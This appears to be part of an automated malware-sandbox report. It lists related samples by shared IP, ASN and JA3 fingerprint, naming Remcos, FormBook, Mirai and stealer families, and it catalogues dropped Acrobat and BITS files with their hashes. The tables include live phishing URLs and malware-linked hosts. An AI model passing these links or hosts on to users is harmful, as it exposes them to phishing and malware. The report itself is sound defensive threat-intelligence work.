                                                                          Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 178.237.33.50

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          GD-EMEA-DC-SXB1DEsora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                          • 80.67.27.3
                                                                          LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                          • 188.138.68.212
                                                                          1C24TVL_00001908.pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 92.205.52.167
                                                                          AUMI-BE9NB240260.pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 92.205.52.167
                                                                          1C24TVL_00001908.pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 92.205.52.167
                                                                          AUMI-BE9NB240260.pdf.exeGet hashmaliciousUnknownBrowse
                                                                          • 92.205.52.167
                                                                          http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                          • 109.239.54.153
                                                                          https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182Get hashmaliciousUnknownBrowse
                                                                          • 92.205.168.252
                                                                          Mark Qualman.zipGet hashmaliciousUnknownBrowse
                                                                          • 92.205.229.68
                                                                          meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 85.25.34.222
                                                                          ONEANDONE-ASBrauerstrasse48DEspecifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 217.160.0.200
                                                                          loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 74.208.23.56
                                                                          https://www.campus-teranga.com/public/redirect?url=https://lhbroker.com/bm/#XYWxleGFuZGVyLmtlZHppb3JAYXNodXJzdC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                          • 74.208.236.218
                                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 217.160.0.200
                                                                          attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 74.208.236.156
                                                                          splarm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 104.192.5.161
                                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                          • 217.160.0.248
                                                                          Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.160.0.113
                                                                          FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.160.0.158
                                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 217.160.0.200
                                                                          ATOM86-ASATOM86NL#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • 178.237.33.50
                                                                          PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • 178.237.33.50
                                                                          17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 178.237.33.50
                                                                          Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
                                                                          Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 178.237.33.50

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          saloader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousStealeriumBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          file.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          https://totspotdaynursery.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1Get hashmaliciousUnknownBrowse
                                                                          • 217.160.0.118
                                                                          • 81.169.145.163
                                                                          37f463bf4616ecd445d4a1937da06e19installer.msiGet hashmaliciousUnknownBrowse
                                                                          • 92.205.55.123
                                                                          W3UokmKK3o.msiGet hashmaliciousUnknownBrowse
                                                                          • 92.205.55.123
                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                          • 92.205.55.123
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                          • 92.205.55.123
                                                                          RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                          • 92.205.55.123
                                                                          file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                          • 92.205.55.123
                                                                          siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                          • 92.205.55.123
                                                                          unique.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                          • 92.205.55.123
                                                                          Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                          • 92.205.55.123
                                                                          siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                          • 92.205.55.123

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):1.3073472470195784
                                                                          Encrypted:false
                                                                          SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvra:KooCEYhgYEL0In
                                                                          MD5:894C587FE797DFF7E62C0620BD61CB9A
                                                                          SHA1:2D928FF50F4A9CA2E991114FFF0D35969E92EB3E
                                                                          SHA-256:B614768DA281B48C799A54846D9DC05C8273D90ED3F7E14BC846D107C2FA91CB
                                                                          SHA-512:2551D309233AE9B836E15A5787EA56E882C9C4786898DB795B8F360DF1CCE128527ABC4D15A2FB5BEEE6A62E9FDAC7EE1F791C195726613A25BB023FAC86C714
                                                                          Malicious:false
                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5810e993, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):1310720
                                                                          Entropy (8bit):0.4221446265190623
                                                                          Encrypted:false
                                                                          SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                          MD5:6FB9A07CACAFC997E86D4F26C8C4277D
                                                                          SHA1:05F114E5EAC179910AA0B423658A6CF77F6EB622
                                                                          SHA-256:EA5C4D976ED72107D1D54F441C82EB538E35F99A6504432939C04EF73157ABD8
                                                                          SHA-512:C3214099ECB9005815BC06EBA4A5AF09D567E9BA66F2A1F1BCC9B195D15F5DDBFB57A1D621C7B9E232A5093A78ABDC1EA7EF21A9EAC5F4A852BACDA5212A2D53
                                                                          Malicious:false
                                                                          Preview:X..... .......A.......X\...;...{......................0.!..........{A.0....|c.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................zJ.0....|..................\.c#0....|c..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                          Download File
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):16384
                                                                          Entropy (8bit):0.07726668391217484
                                                                          Encrypted:false
                                                                          SSDEEP:3:vXEYeiN7XWjn13a/izq2qs1lollcVO/lnlZMxZNQl:fEz47W53qicsQOewk
                                                                          MD5:6CFB5D483FBB61F40E6E27C61D07D5A7
                                                                          SHA1:F64FDC354B78398EF1B1F936B37BCE98237B3133
                                                                          SHA-256:58E16E9E0ADCA5D88FC41566D6FF5CC7C4070C6CCE2B355A5DA39D530D6E26F8
                                                                          SHA-512:5FC5D6520DA7305CCABEB31975C165A64F4AC73453D409F072ED20A391FEB0BA89DABFF6D18AEE7CA0ECCCCD98DC3DBCC7D02F14895BFCAFE2478D9A4B66873D
                                                                          Malicious:false
                                                                          Preview:o..!.....................................;...{..0....|c......{A..............{A......{A..........{A]................\.c#0....|c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.236925402082279
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWia+LSQL+q2Pwkn2nKuAl9OmbnIFUt8YWia+XwG1Zmw+YWia+XwQLVkwOwkn2nC:2iaHQyvYfHAahFUt87iamwg/+7iamwQA
                                                                          MD5:65B9F30AD09CE0EDA71849F83EEB72FF
                                                                          SHA1:E5248CBC6CEF13C089C792945988A7B023C839A8
                                                                          SHA-256:B0B35C90E0F3EEF08F2FAA75B3436485071CF9F8B0E6FA7FDDB506C94E294E66
                                                                          SHA-512:BAF6780FED824FD7328BEABB4DF9282C85C19BD3913F9409A9DC7418DC384DD7CF8587BCEE65BFBC18B9F87D102704EF34670CB2452BA53C433B8FFCD7A86889
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.061 d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/30-14:15:47.063 d18 Recovering log #3.2024/11/30-14:15:47.063 d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.236925402082279
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWia+LSQL+q2Pwkn2nKuAl9OmbnIFUt8YWia+XwG1Zmw+YWia+XwQLVkwOwkn2nC:2iaHQyvYfHAahFUt87iamwg/+7iamwQA
                                                                          MD5:65B9F30AD09CE0EDA71849F83EEB72FF
                                                                          SHA1:E5248CBC6CEF13C089C792945988A7B023C839A8
                                                                          SHA-256:B0B35C90E0F3EEF08F2FAA75B3436485071CF9F8B0E6FA7FDDB506C94E294E66
                                                                          SHA-512:BAF6780FED824FD7328BEABB4DF9282C85C19BD3913F9409A9DC7418DC384DD7CF8587BCEE65BFBC18B9F87D102704EF34670CB2452BA53C433B8FFCD7A86889
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.061 d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/30-14:15:47.063 d18 Recovering log #3.2024/11/30-14:15:47.063 d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):333
                                                                          Entropy (8bit):5.205888811194228
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWiaYUVq2Pwkn2nKuAl9Ombzo2jMGIFUt8YWiatgZmw+YWia4RSIkwOwkn2nKuAv:2iaYsvYfHAa8uFUt87iaq/+7iaQ5JfHA
                                                                          MD5:755122B528657C89BF59546421ECE3A2
                                                                          SHA1:3294EEE5593CB61B9A4B8915F791A430F7083CFB
                                                                          SHA-256:9F0B0F55D946950142C268E073DF0358ED3C55F22F08423D25650CED3E010010
                                                                          SHA-512:FC331867BFCC938E6A3E9D1CC593E0A8012C21F32F800EFD24A3650CD67DA2631FF3AC4EA2F45A277591F92DEF15FF9244FDB9F4280C468FE04B7C38679B411A
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.266 f04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/30-14:15:47.273 f04 Recovering log #3.2024/11/30-14:15:47.275 f04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):333
                                                                          Entropy (8bit):5.205888811194228
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWiaYUVq2Pwkn2nKuAl9Ombzo2jMGIFUt8YWiatgZmw+YWia4RSIkwOwkn2nKuAv:2iaYsvYfHAa8uFUt87iaq/+7iaQ5JfHA
                                                                          MD5:755122B528657C89BF59546421ECE3A2
                                                                          SHA1:3294EEE5593CB61B9A4B8915F791A430F7083CFB
                                                                          SHA-256:9F0B0F55D946950142C268E073DF0358ED3C55F22F08423D25650CED3E010010
                                                                          SHA-512:FC331867BFCC938E6A3E9D1CC593E0A8012C21F32F800EFD24A3650CD67DA2631FF3AC4EA2F45A277591F92DEF15FF9244FDB9F4280C468FE04B7C38679B411A
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.266 f04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/30-14:15:47.273 f04 Recovering log #3.2024/11/30-14:15:47.275 f04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.967403857886107
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF56978a.TMP (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.967403857886107
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b0ba6554-b5d8-4768-8658-298d68e4937e.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.967403857886107
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\cbff048b-c70f-4673-8307-c1d5d83366a6.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.969516568575897
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sq2rahsBdOg2HJcaq3QYiubInP7E4TX:Y2sRdsFWydMHw3QYhbG7n7
                                                                          MD5:E635961A30ABA488B3176BFF007AE1FD
                                                                          SHA1:067BEB637D9A5C11C7C7EF35E679F443993AFD76
                                                                          SHA-256:67D00F38EE5993A9FF7B047B4CB72CCF327E0369094B14608B4799AD225DAC53
                                                                          SHA-512:D36A285364B6703C923BC4FF84455C60AF552098DF6A9B8E00D023ADE718E1ABE45D8D5670EF3360F39FB7BF74ABFF941FEAC69784FDB055808A537C691B1EDB
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377554159046456","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":618734},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4320
                                                                          Entropy (8bit):5.256625575029696
                                                                          Encrypted:false
                                                                          SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo76AGCG:etJCV4FiN/jTN/2r8Mta02fEhgO73goA
                                                                          MD5:41B5A41C595910A2568C5807030019F9
                                                                          SHA1:45CD4300D806E3EF5330A972E8B310B88CB33E3E
                                                                          SHA-256:C2332BB298241FD898A88BB6347C05D4F95CD9ECDFB90EA42DA985C7748721F1
                                                                          SHA-512:4FCD45BE1D3A7CB37E511DD265D34BF9881A5039F708E6A7903BAFFF3094F9A97E6C0778194F9CE0D1E3C689D4D372D32A5460B6A4C827CA75A152EECCCE15F8
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):321
                                                                          Entropy (8bit):5.199845575584166
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWiaCYVq2Pwkn2nKuAl9OmbzNMxIFUt8YWiaCngZmw+YWiaCeIkwOwkn2nKuAl9c:2iazvYfHAa8jFUt87ian/+7iaM5JfHAo
                                                                          MD5:1540650C403EE9667E82D8563F1FBEC1
                                                                          SHA1:FE20E6EEF299BBD047041CFC8F876DE7200BCC7A
                                                                          SHA-256:4491F2BBA278B07DC1821513061EA039BD8D9C2865403C3DD54729AF91AC5E39
                                                                          SHA-512:0D6412D2F6FF3B27461C7A1217CC4155A6F052D827E948143BF4AD3305B2ED7B7938E5CB709FA4FC5686EEA0FB1D458F7BEC92BA24851CDA4279EE86915A0ABF
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.822 f04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/30-14:15:47.823 f04 Recovering log #3.2024/11/30-14:15:47.824 f04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):321
                                                                          Entropy (8bit):5.199845575584166
                                                                          Encrypted:false
                                                                          SSDEEP:6:HWiaCYVq2Pwkn2nKuAl9OmbzNMxIFUt8YWiaCngZmw+YWiaCeIkwOwkn2nKuAl9c:2iazvYfHAa8jFUt87ian/+7iaM5JfHAo
                                                                          MD5:1540650C403EE9667E82D8563F1FBEC1
                                                                          SHA1:FE20E6EEF299BBD047041CFC8F876DE7200BCC7A
                                                                          SHA-256:4491F2BBA278B07DC1821513061EA039BD8D9C2865403C3DD54729AF91AC5E39
                                                                          SHA-512:0D6412D2F6FF3B27461C7A1217CC4155A6F052D827E948143BF4AD3305B2ED7B7938E5CB709FA4FC5686EEA0FB1D458F7BEC92BA24851CDA4279EE86915A0ABF
                                                                          Malicious:false
                                                                          Preview:2024/11/30-14:15:47.822 f04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/30-14:15:47.823 f04 Recovering log #3.2024/11/30-14:15:47.824 f04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                          Category:dropped
                                                                          Size (bytes):86016
                                                                          Entropy (8bit):4.445188505955719
                                                                          Encrypted:false
                                                                          SSDEEP:384:yezci5tziBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rAs3OazzU89UTTgUL
                                                                          MD5:0C202AB72ACA9D3F2960F3590F7B7EBD
                                                                          SHA1:52F24C593F8B5F7F1C75B0D74A29CE4549D5D5EA
                                                                          SHA-256:9F5E9314E1506FD92C788250522F3D0F7420BA86C490F3CF51BD3E99EF28A4AD
                                                                          SHA-512:191B937256505BB0287B0A8BEFD066F44073E1AC115E285EE649EFC37B7EECF80B7EBA56F565166D92CC183D3616AA031F8B97ECF0FC44D99670FAE628738967
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                          Download File
